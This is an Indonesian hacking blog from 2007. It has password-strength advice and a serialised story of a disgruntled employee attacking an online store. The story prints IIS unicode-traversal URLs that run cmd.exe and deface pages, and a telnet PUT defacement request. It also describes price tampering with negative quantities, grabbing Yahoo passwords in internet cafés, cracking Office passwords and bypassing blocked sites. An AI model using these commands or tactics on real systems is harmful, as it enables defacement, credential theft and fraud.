Namun demikian, sebenarnya jika kita dapat menghafal ukuran file-file executable kita, maka file yang terinfeksi dapat segera dikenali dengan melihat pada perubahan ukuran filenya. Setiap file exe dapat diinfeksi sampai dua kali oleh virus ini, masing-masing dengan penambahan ukuran file sebesar 28 KB dan 40 KB. Maksudnya, jika sebuah file telah terinfeksi dan bertambah ukurannya sebesar 28 KB, maka infeksi selanjutnya akan menambah ukuran file sebesar 40 KB, demikian pula sebaliknya. Jadi, setiap file yang terinfeksi dapat bertambah ukurannnya sebesar 68 KB.

Mematikan Proses Virus
Sebenarnya saya tidak tahu dunia program sama sekali. Jadi saya tidak punya jurus jitu melawan virus ini karena file wmdrtc32.dll tidak dapat di delete begitu saja. Hanya saja karena file dll yang dibuat juga menginfeksi file explorer.exe seperti yang dilakukan oleh kspoold, saya jadi teringat dengan artikel yang pernah saya download dari vaksin.com. Diartikel tersebut ada source code remover sederhana untuk mematikan proses virus sekaligus menghapus file virusnya yang bias dibuat dengan notepad. Source code ini dapat dimodifikasi untuk mematikan proses serta menghapus file wmdrtc32.dll dan wmdrtc32.dl_ yang terdapat di direktori system. Saya tidak menyertakan source codenya disini karena artikelnya akan semakin membengkak ukurannya. Selain itu saya malas dicap suka menjiplak tulisan orang. Jadi kalau mau download sendiri aja di situsnya vaksin.com!
Membersihkan file terinfeksi

Lantas bagaimana nasib file-file exe yang telah terinfeksi? Sampai saat ini, liris terakhir PCMedia yakni PCMedia RC22 belum mengenal virus Alman sama sekali, sedangkan Ansav mengenalnya dengan nama Sality tetapi tidak dapat membersihkannya, file terinfeksi akan dihapus. Hal tersebut tidak berbeda jauh dengan Anti Virus AVG yang hanya main delete saja ketika bertemu virus ini. Berhubung karena saya bukan seorang programmer dan tidak tahu-menahu sama sekali seputar dunia pemrograman, saya hanya mengandalkan kaspersky (bisa juga pake McAfee) update baru yang telah dapat mengenal virus ini dengan baik serta dapat membersihkan file-file yang terinfeksi meskipun tidak semua file dapat dibersihkan dengan sempurna.

Thanks to :

1. Dosen dan Ketua jurusanku yang telah membantuku melepaskan diri dari jurang DO 31 Agustus lalu

2. Vee yang telah memberiku pelajaran sangat berharga meskipun menyakitkan

3. Mua-muanya dech

eL!t!zT

Pemberitahuan

2007-12-12T16:07:00.000-08:00

Pemberitahuan, Bahwa mulai hari senin topik yang dibahas di blog saya ini tidak selalu Hack, hal ini dikarenakan diskusi panjang saya dengan Toni dan Mawarta (Anak STMIK JAYAKARTA) Dan Beberapa Dosen yang ahli dalam bidangnya (Baik itu Dosen BUNDA MULIA, JAYAKARTA , BINUS , BUNG KARNO , SUPRA). Saya sebagai penulis memutuskan bahwa kita harus mengembangkan diri. Baik itu disekuriti , web, programming , pengetahuan umum. Salah satu artikel yang membuka mata saya adalah “HOW TO BECOME A HACKER" bahwa untuk menjadi seorang hacker kita sebenarnya wajib mempelajari Networking (jaringan) , Programing , Sistem Operasi , Internet. Untuk programing saya akan membelahnya menjadi dua yang pertama saya beri nama Visual yang membahas dari Visual Basic,Delphi, C#, sampai terakhir Oracle Form,yang kedua adalah Non Visual yang akan membahas C++,Perl,Phyton,Java. Untuk semua artikel programing akan diajarkan dari dasar hingga ke bentuk aplikasi jadi.Untuk Web saya akan banyak menulis tentang HTML, Javascript, ASP, PHP. Untuk pengetahuan umum akan dibahas seputar masalah komputer dan aplikasi dasar seperti Office dan akan memabahas pula tentang sistem operasi, pokoknya hal-hal yang umum deh, Untuk sekuriti kita akan tetap membahas Hacking dan bagaimana memproteksinya. Adapun pembahasannya menghabiskan satu topik terlebih dahulu. Contoh pas programing saya membahas Visual Basic maka saya akan menyalesaikan vb sampai aplikasi jadi lalu saya akan berganti topik ke delphi, begitu juga dengan yang lain. Berikut ini saya akan memberitahukan jadwal menulis saya :
1.Senin Pemrograman Visual Dimulai Dari Visual Basic
2.Selasa Sekuriti 1
3.Rabu Web
4.Kamis Pengetahuan Umum 1
5.Jumat Pemrograman Non Visual Dimulai dari C++
6.Sabtu Sekuriti 2
7.Minggu Pengetahuan Umum 2
Mungkin banyak bertanya kenapa pemrograman dibagi menjadi dua. Tujuan mempelajari non visual adalah untuk melatih logika pemrograman kita, jadi lebih kearah pemanfaatan logika, sehingga mungkin kita nanti lebih banyak bicara bagan alur untuk melatih logika. Tujuan Visual adalah membantu teman-teman yang sudah bekerja untuk mengembangkan diri dalam mengejar karir.

Bad & Good Password

2007-12-11T21:46:00.000-08:00

Beberapa orang memang terkadang menjadikan sebuah password itu adalah kata-kata yang mudah diingat, seperti nama istri,nama pacar atau tanggal lahir(Hanya mengulang agar tidak lupa). Seperti yang kita bahas kemarin bahwa password yang seperti itu masuk kedalam Bad Password, lalu apa saja sih yang menjadi tanda bahwa pasword itu buruk ? Tanda-tanda paswword yang buruk adalah:
1.Terdiri dari 2 sampai 7 karakter atau kurang
2.Terdiri dari satu suku kata misalnya makan, minum, bunga, indah dan lain-lain
3.Tidak Terdiri dari campuran angka dan huruf
4.Terdiri dari campuran dan huruf tetapi masih ada artinya
5.Terdiri dari Tanggal Lahir
Jika password merupakan salah satu tanda diatas , cracker dengan mudah menggunakan list dari kamus yang biasa dimasukkan ke cracklist mereka.Dibawah ini akan ada contoh password yang mudah diambil oleh craker:
12345,abc123,password,computer,123456,tigger,1234,a1b2c3,xxx
Jika teman-teman masih mempunyai password yang terdapat disalah satu contoh diatas maka .... Selamat anda termasuk orang yang mempunyai password yang buruk.
Kalau kita sudah mengetahui apa yang dimaksud dengan bad password lalu apa yang dimaksud dengan Good Password. Password yang baik terkadang sangat susah sekali mengingat password tesebut, biasanya terdiri atas minimal dari dua suku kata atau kombinasi beberapa angka dan huruf. Apa yang menjadi tanda bahwa password kita tergolong yang baik
1.Terdiri dari 7 karakter atau lebih
2.Terdiri dari suku kata atau lebih
3.Terdiri dari campuran angka dan huruf
4.Tidak terdiri dari tanggal lahir
Contoh password yang baik adalah sebagi berikut: minumair,bungacitralestari,1xx2bgh, vb3660
Hal tersebutuntuk menghindari kemudahan peng-crak-an password sehingga memaksa cracker untuk berpikir dua kali. Tentu saja semua yang kita bahasa akan menjadi sia-sia bila kita mencatat password kita dikertas atau bahkan dinotepad. He.. jangan heran kenapa saya masing sering menjumpai teman-teman saya masih mencatat password di notepad. Bagi teman-teman yang sudah mengerti silakan mencoba memproteksi password kalian masing-masing, Bagi yang belom mengerti ulangi membaca artikel yang kemarin tentang Snad boy Tool.

Kelemahan Password

2007-12-11T20:25:00.000-08:00

Terkadang orang sering menyepelekan password, padahal password sendiri adalah sesuatu yang penting. Orang sering salah kaprah dengan membuat password yang mudah diingat, seperti nama pacar, nama istri, tanggal lahir, jabatan. Hal tersebut sebenarnya secara tidak sengaja membuat suatu lubang yang sangat besar didalam sistem keamanan.Seorang penyusup akan dengan mudah mengambil password kita jika apa yang ditulis diatas masih kita pakai. Password sama seperti kunci rumah kita, kalau kita sering menyimpan kunci kedalam pot, atau dibawah kesat (Hal ini sering dilakukan anak kost). Maka seorang yang handal dapat menjadi penjahat, karena dia mengetahui tempat penyimpanan kunci itu. Begitu juga dengan password, jika kita mempunyai password 'default'(Biasanya Password admin pada waktu penginstall xp dikosongkan), maka dengan mudah cracker akan dengan mudah menebak password anda, bisanya password yang sering digunakan oleh user sama seperti yang disebut diatas. Perlu diingat seorang cracker pasti lebih pintar dari kita untuk mendapatkan informasi tentang kita dari manapun. Jadi saya berharap setelah membaca artikel ini kita dapat membuat password yang cukup membuat cracker menjadi pusing.Jangan biarkan cracker mengambil passwordmu dengan mudah, Besok kita akan membahas apa yang disebut Bad Password(Password yang Buruk) dan Good Password (Password yang Baik). Belajarlah menggunakan password bukan saja yang gampang diingat tetapi juga yang baik. Semua ini untuk kemajuan ilmu pengetahuan dan kemajuan bersama dalam bidang keamanan data.

Snadboy tool

2007-12-11T16:04:00.000-08:00

Software ini katanya bis menemukan password dengan karakter bintang(*) ataupun bulat sepertio di aplikasi Yahoo Messenger. Pada saat diuji coba oleh saya sih hanya pada YM dong yang berhasil. Oke daripada jadi bengong dan lalat masuk, mari kita coba saja. Pertama carilah Tolls yang bernama snadboy's Revelation, kedua anda harus menginstall dahulu program Snadboy, cara penginstallan say tidak bahas karena hanya next,next,jadi deh. ketiga bukalah program snadboy. Lalu bagaimana car melihat passwordnya ? O ya hampir lupa caranya adalah anda tinggal klik dan drag lambang + yang berada dalam bulatan lalu arahkan kekarakter password asterix yang anda ingin lihat passwordnya. Benar khan saya bilang, penggunaan program ini sangat mudah sekali. Pengalaman saya bermain internet diwarnet banyak sekali ditemukan Yahoo id dan passwordnya dengan program seperti ini kita dapat melihat passwordnya, sayangnya program ini ketika saya coba hanya berhasil pada YM saja. Apa anda belom mendapatkan Snadboy lalu untuk apa membaca sekian panjang, gimana toh. Oke Snad boy dapat didapatkan di situs http://www.snadboy.com/ bagi yang diblok dapat mencoba melewatinya dengan situs-situs yang sudah saya jelaskan terlebih dahulu, oya kedepan saya hanya akan menjelaskan Tools yang banyak digunakan oleh peyusup untuk memudahkan langkanya. Besok sih kalau engga ada halangan saya akan menuliskan teknik SQL Injection yang pernah digunakan oleh teman kita Toni.Ingat Semua ini untuk kemajuan Ilmu pengetahuan bukan untuk menjadi Penjahat.

Informasi Tambahan Hacker

2007-12-10T17:32:00.000-08:00

Tampaknya judul diatas memang terlalu berlebihan. Yah, karena saya akan menunjukkan kepada anda bagaimana mengikuti dunia security yang selalu berkembang agar anda tidak ketinggalan. Ada beberap site yang saya rekomendasikan buat teman-teman diantaranya:
www.jasakom.com
situs ini sangat baik untuk menambah pengetahuan kita disitus ini memusatkan perhatiannya pada masalah keamanan yang berhubungan dengan komputer. Situs ini bertambah keren dikarenakan banyaknya penulis buku yang bergabung disini.
www.astalavista.bok.sk
Situs ini adalah situs yang paling lengkap dan segala informasi yang anda butuhkan untuk belajar ada disini.
www.infosekuriti.com
Situs ini lebih banyak bercerita tentang sekuriti. Situs ini dikelola oleh seorang yang berbakat yaitu Xnuxer. Seorang yang menghack situs KPU
www.kecoak.or.id
Situs ini merupakan situs yang paling tua yang membahas tentang masalah hacking dalam bahasa indonesia
www.neoteker.or.id
Situs ini didukung oleh majalah Noetek yang memberikan informasi seputar keamanan komputer dalam bahasa indonesia.

Situs-situs tersebut dapat diakses semoga saja dapat membantu teman-teman dalam mempelajari keamanan komputer lebih lanjut. Dengan judul diatas bukan berarti saya akan pensiun menulis disini tetapi saya ingin memacu diri sendiri supaya situs ini dapat berkembang dan bisa berguna bagi orang banyak, Buat Teman-teman yang udah setia baca situs ini saya ucapkan terima kasih. Saya masih mengharapkan komentar dari teman -teman so beri saya komentar yah

Apa yang salah

2007-12-10T16:26:00.000-08:00

Apa yang salah dalam kita belajar baik itu dari Dosen tercinta dan dari buku ? Topik ini jadi menarik minat saya untuk mengangkatnya sebagai Posting saya. Dalam kita belajar Bahasa pemrograman kita sering dijebak baik itu sengaja atau tidak sengaja untuk mempermudah hacker untuk melakukan serangan baik itu terhadap aplikasi yang kita buat ataupun server kita. Lalu dimana kesalahannya, kesalahannya terletak keseragaman coding yang dibuat. Sebagai contoh saya memakai Bahasa pemrograman Visual Basic ketika kita sudah membuat sebuah textbox kebiasaan yang diturunkan dari dosen adalah ganti nama textbox1 menjadi txtuser. Sepintas lalu memang ada baiknya sehingga pembacaan coding jauh lebih mudah, tetapi bagaimana kalau coding itu jatuh ketangan yang salah. Sayangnya banyak dosen yang masih text book dalam mengajar sehingga apa yang diajarkan tidak jauh berbeda dengan buku. Bayangkan jika semua aplikasi menggunakan cara diatas setiap kali hacker ingin melalukan serangan mereka tinggal mencari txtuser. Parahnya lagi ini juga terjadi dalam pembuatan database . Kita juga dibiasakan membuat table yang isinya user dan password dengan nama tbl_user, user. Hal ini biasanya diajarkan dosen kepada kita, kalau diselidiki kenapa dosen mengajarkannya kepada kita ?. Banyak yang akan bilang karena buku mengajarkan demikian. Terlihat disini adanya pembunuhan kreativitas kita sebagai pembuat aplikasi. Setidaknya itulah yang saya rasakan pada ujian tengah semester pada salah satu matakuliah bahasa pemrograman. Coding yang sangat mirip dengan apa yang diajarkan itulah yang bernilai sangat tinggi, jadi dapat dikatakan jaman sekarang adalah jaman yang dibuat untuk menghapal coding bukan untuk mengerti coding. Coding yang gampang dibaca sangat disukai oleh penyusup karena akan sangat mudah untuk dibaca. Konsep belajarpun telah berubah, nilai menjadi proritas utama bukan lagi skill maka tidak heran dibeberapa kampus ujian bahasa pemrograman soalnya sama dengan apa yang telah dipraktekan. Saya disini bukan mau menjelek-jelekan siapa- siapa hanya ingin membenahkan apa yang salah, hal ini disebabkan saya berpikir dengan cara Hacker. Beberapa hari lalu saya bertemu dengan anak semester 5 salah satu sekolah tinggi ilmu komputer *********, yang belom tahu apa saja kelemahan java script yang diajarkan dikampus. Moga-moga saja mereka membaca apa yang saya tulis sehingga mereka mengerti. Buat Para Dosen yang membaca artikel ini jangan tersingung buatlah mahasiswa/i menjadi kreatif bukan memudahkan mahasiswa yang mengakibatkan mahasiswa/i menjadi bodoh.Hati-hatilah mengajarkan sesuatu jangan anda mengajarkan sesuatu sehingga menjadi bumerang waktu mahasiswa/i pada dunia kerjanya . Bila perlu ajarkan keamanan program atau aplikasi. Menurut saya itu lebih penting daripada memaksa sesuatu yang tidak penting seperti penggantian nama.

Java Script Matikan saja

2007-12-10T15:49:00.000-08:00

Setelah merasa aman, merekapun akhirnya pulang kerumah mereka masing-masing. Tapi yang terjadi pada keesokan harinya ? Keesokan harinya, kejadian yang sama terjadi lagi. Lagi-lagi barang-barang mereka yang dijual dengan harga yang sangat murah bahkan ada juga yang gratis. Apalagi yang salah ? Proteksi dengan java script adalah suatu kebodohan karena java script pada dasarnya adalah script yang dijalankan oleh browser. Masalahnya kita sebagai client mempunyai kontrol penuh atas script tersebut, artinya adalah kita dengan mudah bisa menonaktifkan java script dan melewatinya.Cara melewati proteksi oleh java script ini cukup mudah, dari IE(Internet Expoler) pilih tools terus internet optios terus custom level terus scripiting terus active Scripting kita disable. Mereka bertekad untuk memulai usaha dari apa yang tersisa dan percaya bahwa dengan sistem dengan yang aman. Dengan bantuan mahasiswi yang mereka percaya, mereka memperbaiki situs mereka. Pengecekan dengan java script akhirnya dibuang digantikan dengan program server side yaitu ASP. Program ASP ini akan mengecek angka minus dan otomatis akan menggantinya menjadi angka plus. Dengan Teknik ini hacker tidak akan lagi mungkin memasukan angka minus. Apa sih yang menjadi kesimpulan panjang cerita ini.Kesimpulannya adalah firewall tidak akan menjamin anda aman dari serangan Hacker, 70 % hacking dilakukuan melalui port 80, Tidak perlu pengetahuan yang rumit untuk menjadi seorang penyusup, serangan tidak selalu dari orang luar, jangan mengunakan script client side untuk melakukan sesuatu yang penting, jangan percaya dengan informasi yang dikirimkan, lakukanlah pengecekan ulang sekali lagi pada server side cek dan cek lagi. Besok saya coba menyoroti sistem pembelajaran kita yang salah sehingga memudahkan Hacker.Jangan lupa ini hanya untuk kemajuan ilmu pengetahuan.

Kita diajarkan menjadi Hacker

2007-12-09T18:16:00.000-08:00

Memang benar Kita telah diajarkan menjadi Hacker dari taman kanak-kanak. Toni telah memanfaatkan perhitungan dasar matematika untuk melakukan Hacking pada saat memesan barang. Hacker memasukkan angka minus sehingga total dari penjumlahan menjadi berkurang. Sebagai contoh, dengan membeli barang Rp 1000000 sebanyak 1 buah dan memesan barang seharga Rp 999000 sebuah maka total yang harus dibayar adalah -1*1000000+1*999.000 sama dengan 1000. Sebenarnya masih banyak situs yang tidak melakukan pengecekan yang sangat sederhana ini. Ini merupakan bukti bahwa kita dari kecil telah dijarkan menjadi seorang hacker. Setelah ditolong oleh mahasiswi terebut dengan memberi semangat akhirnya tiga sekawan tidak menyerah dan tetap bersemangat sesuai dengan ajaran Buku " Berani Gagal ". Dengan Bantuan mahasiswi tersebut, merekapun menambahkan Javascript kedalam situs mereka untuk mencegah pemasukan karakter selain 0-9. Jadi Pemasukan minus otomatis akan dicegah. Setelah dilakukan pengetesan selama tiga hari akhirnya situs mereka diaktifkan kembali. Melihat situs ini aktif kembali Toni sangat senang, karena dia dapat belanja murah lagi. Tiga sekawan itu pun akhirnya pulang kerumah masing-masing. Mungkin banyak pembaca yang bingung kenapa mahasiswi itu tetap saja dipakai walaupun sudah berkali-kali diketahui bahwa web yang dibuatnya banyak kelemahannya. Tapi itulah yang terjadi, jadi dapat dikatakan karena ini terjadi karena ketiga sekawan tersebut terbuai oleh paras mahasiswi tersebut, atau jangan-jangan mahasiswi tersebut memakai susuk kali yah. By The Way cerita ini akan terus berlanjut dikarenakan teman kita terus berkembang dalam ilmu Hacknya jadi jangan sampai ketinggalan episode berikutnya yah.

Nice sql

2007-12-09T17:50:00.000-08:00

Masuk ke miinggu kedua, semua dealer komplain karena uang yang mereka setorkan hilang ketika mereka hendak membeli barang.Hal ini membuat tiga sekawan mengalami kerugian yang sangat besar. Akhirnya mereka kembali ke mahasiswi tersebut, Setelah diadakan penyelidikan maka diketahuilah bahwa adanya kelemahan terhadap serangan Sql Injection. Tiga sekawan itupun dengan bantuaan mahasiswi itu segera memperbaiki permasalaha nini dengan menetapkan bahwa semua nama login dan password untuk dealer haruslah berupa karakter "a" -"z" selain karekter tersebut akan ditolak oleh system sehingga teknik SQL Injection tidak akan dimungkinkan lagi. Walaupun telah diperbaiki, tiga sekawan sudah putus ada dan memutuskan untuk menutup situs dan berhenti sama sekali dari bisnis online. Pada saat mereka ingin pulang datanglah mahasiswi yang memberikan kepada mereka sebuah buku yang berjudul "Berani Gagal" karangan Billi P.S.Lim yang ternyata sangat berkhasiat. Mereka sangat bersemangat kembali seperti seorang samurai, akan tetapi ada sebuah berita burik bagi Alex, yaitu Toni mengudurkan diri dari tokonya dengan alasan mendapat pekerjaan yang lebih baik sebagai Staff Jaringan disebuah Tour Travel. Tanpa merasa curiga Alex menyetujui pengunduran diri Toni Tersebut. Besok paginya tiga sekawan ingin mengecek bisnis mereka, tidak lupa membawa mahasiswi tersebut. Setelah mereka melihat situs mereka, marahlah mereka karena kali ini mereka mendengar kabar bahwa semua barang - barang dagangan mereka terjual dengan harga dibawah 1000 rupiah. Apa yang dilakukan Toni kita akan Bahas besok

Hack Lagi

2007-12-06T18:12:00.000-08:00

Yup, hari ini kita membahas kembali apa yang terjadi pada situs alex dan kawan-kawan.Ketika mengecek kembali situs mereka yang diperbaiki, ternyata situs mereka kembali dihack oleh Toni dengan kata-kata "Selamat Yah, Web ini Telah Didaface " Salam dari Hacker. He..he... Kali ini Toni kembali mempraktekkan apa yang dipelajarinya dari buku yang sama. Apa yang dilakukan Toni ?Adapun yang dilakukan oleh Toni adalah melakukan telnet ke port 80 situs Justice, kemudian menjalankan peritah put untuk menulis file. Peritah yang ditulis Toni adalah sebagai berikut :
C:\>Telnet www.Justice.com 80
put /default.htm http/1.1
Host:www.Justice.com
Content-lenght:110

Selamat Yah, Web ini Telah didaface

Salam dari hacker
Perintah diatas digunakan untuk melakukan penulisan ke web serever yang dilakukan Toni untuk mendaface. Kali ini mereka pun mendatangi mahasiswi yang membuat web lagi guna mencari solusi bagaimana hal itu tidak terjadi lagi, Mahasiswi tersebut mencari permasalahan yang terjadi. Setelah diperiksa, maka diketahuilah bahwa option PUT dimungkinkan karena adanya setting " Write" pada IIS.Pertama kali dijelaskan Toni pun saya tidak mengerti, sampai saya membaca sendiri tulisan S'to dibuku yang sama dengan Toni.Pengaktifan pilihan write ini memang sering dilakukan kerena kurang mengertinya setting IIS yang aman.Setelah mematikan pilihan ini, tiga sekawan mulai kembali lagi percaya diri dan belajar dari pengalaman mereka pun tidak menyombongkan diri lagi seperti kemarin.Merekapun mengaktifkan kembali operasional Situs mereka. Sehari, dua hari, tiga hari , seminggu, semua berjalan dengan lancar dan bisnis tampaknya lancar dan dapat dikatakan Sukses.Pengiriman barang terutama ke dealer terus terjadi dalam kuantitas yang sangat besar.

Tragedi

2007-12-05T16:05:00.000-08:00

Setelah Alex dibuat pusing oleh Toni, masalah pengunaan internet, maka Alex berpikir akan mencari uang tambahan, Karena kurang modal maka Alex menghubungi Tom dan Jerry untuk membantu Alex mewujudkan mimpinya. Setelah meraka berhura-hura, mereka memutuskan untuk membuka sebuah toko online. Mimpi mereka bertiga ingin membuka toko online terbesar dan termegah di dunia. Karena kurangnya pengetahuan mereka tentang Web, Alex memutuskan untuk mencari seorang pembuat web. Singkat cerita dengan bantuan Toni, mereka mendapatkan seorang pembuat web yang mau dibayar murah untuk membuat web bagi mereka walaupun anak itu baru semester tiga diperguruan tinggi dan mengaku sudah biasa berkerja dijaringan. Meraka sangat tertarik apalagi pembuat webnya seorang wanita. Singkat kata jadilah sebuah situs penjualan online yang beralamat di www.justice.com. Pada situs ini pengunjung bisa memilih semua barang baik itu elektronik,baju,celana,underware,makanan dan lain-lain yang ingin dibeli, klik dan barangpun akan segera diantar.Sasaran mereka bukanlah toko-toko biasa melainkan dealer-dealer. Ada satu ketentuan jika ingin belanja disini selain meraka diharuskan login mereka juga wajib menyetorkan deposit uang. Karena harga yang sangat murah , tuntu saja akan banyak dealer yang akan diraih.Setelah melihat situsnya online diinternet.Mereka pun merayakannya hari pertama onlinenya toko mereka dengan minum bir sampai pagi.Sebelum pulang kerumah mereka memutuskan untuk melihat pengunjung situs mereka dan jumlah order situs mereka. Namun apa yang mereka dapat situs meraka telah dibajak oleh Hacker dengan tulisan "Hacking by Me". Tentu saja yang menghack situs mereka temen kita yang masih sakit hati dengan Alex.Tapi sayangnya Alex tidak tahu. Toni menggunakan serangan dengan metode yang dinamakan sebagai unicode yang dipelajarinya dari buku Seni Internet Hacking UNCENSORED. Toni menyerang dengan mengetikkan url justice sebagi berikut untuk melihat isi direktory.
C>
HTTP://WWW.JUSTICE.COM/SCRIPTS/..%CO%AF../WINT/
SYSTEM32/CMD.EXE?/C+DIR+C:\
Untuk mecopy isinya maka Toni mengunakan perintah ini
HTTP://WWW.JUSTICE.COM/SCRIPTS/..%CO%AF../WINT/
SYSTEM32/CMD.EXE?/C+Copy+C:\WINT \SYSTEM32\CMD.EXE+C\CMD1.EXE
Dan untuk membuat tulisan hacking by me
HTTP://WWW.JUSTICE.COM/SCRIPTS/..%CO%AF../cmd1/
c+echo+Hacking+by+me+>+c:\inetpub\wwwroot\index.htm
Menurut saya, Toni lagi beruntung saja karena unicode sudah sangat kuno, Kemudian mereka bertiga datang kembali ke mahasiswi yang katanya berkerja dijaringan, melalui proses panjang maka mahasiswi tersebut menyarankan jimat-jimat penangkal Hacker, yaitu Firewall, Patch dan antivirus. Dengan keyakinan penuh bahwa situs mereka telah aman dari gangguan yang namanya hacker, situs Justice.com online kembali dengan gagah. Tanpa ragu, mereka memberikan pernyataan "Kami telah memasang service pack terbaru, hotfix terbaru,antivirus terbaru dan firewall terbaru. Web anti Hacker".Setelah semua beres mereka pun merayakan keberhasilan mereka mengalahkan hacker dengan minum-minum sampai pagi. Apa yang mereka dapat besok pagi adalah sambungan cerita hari ini so jangan lewatkan yah
Kesimpulan hari ini adalah jangan pernah percaya dengan sesuatu yang murah, serahkanlah pada pakarnya.Dunia Internet bukanlah dunia yang bisa dipercaya jadi sering-seringlah melakukan pengecekan ulang,cek dan cek kembali.Ingat semua yang saya tulis hanyalah sebagi pengetahuan saja.Bukan untuk mengajari anda sebagai Hacker.

Balas Dendam

2007-12-04T15:58:00.000-08:00

Setelah Toni dipecat, dia mencari Alex untuk mendapatkan pekerjaan, Alex memang memberikan pekerjaan disalah satu toko miliknya. Karena Toni tidak tahu bahwa yang menjual data perusahannya adalah Alex, Toni sangat senang ketika dia mendapat pekerjaan itu, dengan wajah yang penuh optimis Toni akan memajukan tokonya Alex. Dikantor yang baru Toni memproteksi komputernya, hal ini disebabkan ia tidak ingin kehilangan pekerjaannya lagi. Sayangnya ditempat yang baru internetnya tidak sebebas di kantor yang lama. Toni tidak dapat lagi men-download Software-software free, bahkan untuk melihat saja tidak bisa , apalagi untuk kesitus yang parah. Toni berusaha mencari informasi bagaimana cara bypass situs yang diblok, maka diapun masuk kebeberapa forum. Disalah satu forum Toni memdapatkan informasi bahwa yang menjual data perusahaan X adalah Alex, Toni makin berniat untuk membalas dendam ke Alex, dicarilah informasi tentang bypass situs yang diblok. Diforum BlueFame Toni mendapatakan informasi untuk bypass situsyang diblok.

Nama situsnya http://www.kproxy.com/ sayangnya situs ini menjadi rebutan orang-orang untuk bypass situs, kecewa dengan apa yang ia dapat, Toni mencari lagi informasi dengan menggunakan situs yang lain, dan dia mendapat bukan hanya satu melainkan dua buah situs yang sampai hari ini masih dia gunakan untuk bypass situs yang diblok. Situs yang pertama adalah www.mathburger.com

Situs yang lainnya adalah www.proxysite.com kedua situs ini mempunyai kemampuan untuk bypass situs-situs yang diblok. Toni sangat senang tetapi masih ada yang kurang dihatinya setiap kali mendownload film atau file yang cukup besar, sangat memakan waktu yang lama malah kadang file tersebut tidak dapat dibuka.Toni pun mencari informasi lagi di forum Blue Fame . Disitulah dia bertemu dengan seseorang yang memakai nick name vbbego. Oleh Vbbego, Toni disarankan mengunakan Internet Download Manager yang dapat didownload disitus www.internetdownloadmanager.com, tetapi vbbego juga mengingatkan bahwa dengan Internet Download Manager, bandwith internet yang dipakai dapat disedot habis. Otak busuk Toni mengatakan inilah saatnya balas dendam ke Alex. Toni pun dapat bebas mencari situs apapun sekarang dan seringkali menghabiskan bandwith untuk mendownload game,software dan kadang-kadang juga film. Kalau kita yang menjadi orang jaringan mungkin kita sakit hati dengan Toni. Adakah cara untuk menghentikan Toni? Tentu saja anda cukup dengan membatasi Bandwith yang dapat digunakan oleh setiap komputer misalnya untuk mendownload file dibatasi 4,00 kb. Untuk memblok situs yang dapat melakukan bypass situs yang diblok , anda dapat melakukan blok ip internetnya situs tersebut.Dendam pun terbalas di akhir bulan Alex mendapatkan tagihan internet sebanyak Rp 2.000.000,- untuk sebuah toko Handphone.
Ini hanya untuk ilmu pengetahuan jangan salah digunakan. Menjadi orang baik itu jauh lebih susah daripada menjadi orang jahat. So jadilah orang baik sehingga dunia ini dipenuhi oleh kebaikan.

Data

2007-12-03T16:23:00.000-08:00

Data adalah hal yang penting dalam perusahaan. Didalam Aplikasi word data sudah dapat diproteksi dengan password sehingga tidak jatuh ketangan yang salah. Apakah data tersebut sudah aman. Tentu saja tidak banyak sekali aplikasi sekarang ini yang dapat menembus sistem proteksi dengan Password. Sebagai contoh saya memcoba membuat file word yang kemudian saya save dengan bantuan security options. Apakah sudah aman ternyata belum, sebagai contoh saya mengambil Software Advanced Office XP Password Recovery, maka dapat ditebak file word yang saya simpan dengan proteksi dapat terbuka dengan mudah. Lalu adakah cara aman untuk mencegah hal itu terjadi. Sayangnya sampai saat ini cara itu belum ada. Saya hanya bisa memberikan beberapa tips saja . Pertama belajarlah untuk pelit terhadap password komputer anda, Kedua gunakanlah aplikasi Folder Lock untuk mengunci data anda, Ketiga gunakanlah sistem opersai lain yang memiliki celah sekuriti yang lebih baik.
Software Advanced Office XP Password Recovery Dapat didownload di http://www.elcomsoft.com/aopr.html dan Folder lock dapat didownload di http://www.newsoftwares.net/folderlock/.
Kenapa anda saya sarankan memakai Folder Lock, karena Folder Lock mengunci dengan cepat dan dapat menyembunyikan diri.
Gunakanlah tool ini dengan bijak jangan untuk merusak tetapi gunakanlah untuk kebaikan dengan demikian majulah Dunia Teknologi Informasi bangsa ini. Pada akhirnya saya mencoba meceritak sebuah pengalaman pahit yang terjadi pada Teman saya. Anggap saja namanya Toni yang berkerja di sebuah Perusahaan sebut saja X, Toni seorang yang menggangap remeh masalah sekuriti komputer, bahkan dia bisa meninggalkan komputer dalam waktu lama tanpa membuat Proteksi apa pun. Suatu hari ada orang yang iseng ingin melihat data apa saja yang dipunya oleh Toni, sebut saja orang itu namanya Alex. Alex mencopy semua file word yang dalam komputer itu. Ketika Alex ingin membuka file tersebut ternyata sudah diantisipasi dengan Password. Alex menghack password tersebut dengan software yang kita bahas. Dan mempubikasikannya ke Internet. Alhasil Toni dipanggil oleh atasannya, dengan seribu satu jurus ia menerangkan bahwa tidak mungkin datanya tidak bisa dilihat oleh siapapun, karena sudah diproteksi oleh Password. Lalu atasannya membuka satu situs yang telah menmpilkan seluruh data rahasia perusahaan X. Hal ini jelas membuat Toni ketakutan bukan mendapat solusi, ia malah mandapatkan makian sekaligus pemecatan atas dirinya. Teman mungkin cerita ini dapat membuat kita sadar seringkali kita juga berbuat hal yang sama dengan Toni.Marilah kita sadar bahwa Cracker mempunyai kepintaran 2x dari kita pengguna Komputer, oleh sebab itu belajarlah memproteksi komputer kita dari serbuan Cracker.

Tentang Istilah

2007-12-02T15:58:00.000-08:00

Dari kemarin kita sudah banyak bicara tentang hacker, cracker, script kiddies, lalu apa arti dari semua itu, bukan sama. Tidak, semua itu tidak sama bahkan sangat berbeda.Sebelum kita semakin pusing labih banyak kita mengetahui terlabih dahulu apa itu hacker ? Hacker adalah pengakuan orang yang diberikan kepada orang yang senang mengutak-atik komputer termasuk bahasa programing seperti assembly, C dan bahasa komputer menegah lainnya. Sedangkan Cracker adalah pengakuan orang yang ditujukan buat orang yang menggunakan keahlian hackingnya dengan tujuan merusak. Script kiddies labih ditujukan untuk mereka yang tidak punya keahlian khusus di bidang hacking. Meraka hanya meng- download hacking tools dari internet dan kemudian mencoba hacking dengan tools tersebut. Dalam sebuah artikel ada tulisan yang sangat menarik yaitu cara berpikir hacker tidak terbatas pada budaya hacker software saja, bahkan sudah banyak orang menerapkan pada bidang yang lain seperti musik,elektronik dan lain sebagainya. Hacker sendiri tidak menyukai cracker, hal ini disebabkan karena hacker mempunyai sifat yang mulia, sikap itu adalah sikap percaya pada kebebasan dan kerja sama sukarela. Jadi dimata hacker dunia ini penuh dengan persoalan-persoalan yang menarik yang menanti untu dipecahkan. Sayangnya masih banyak saja orang yang mempunyai 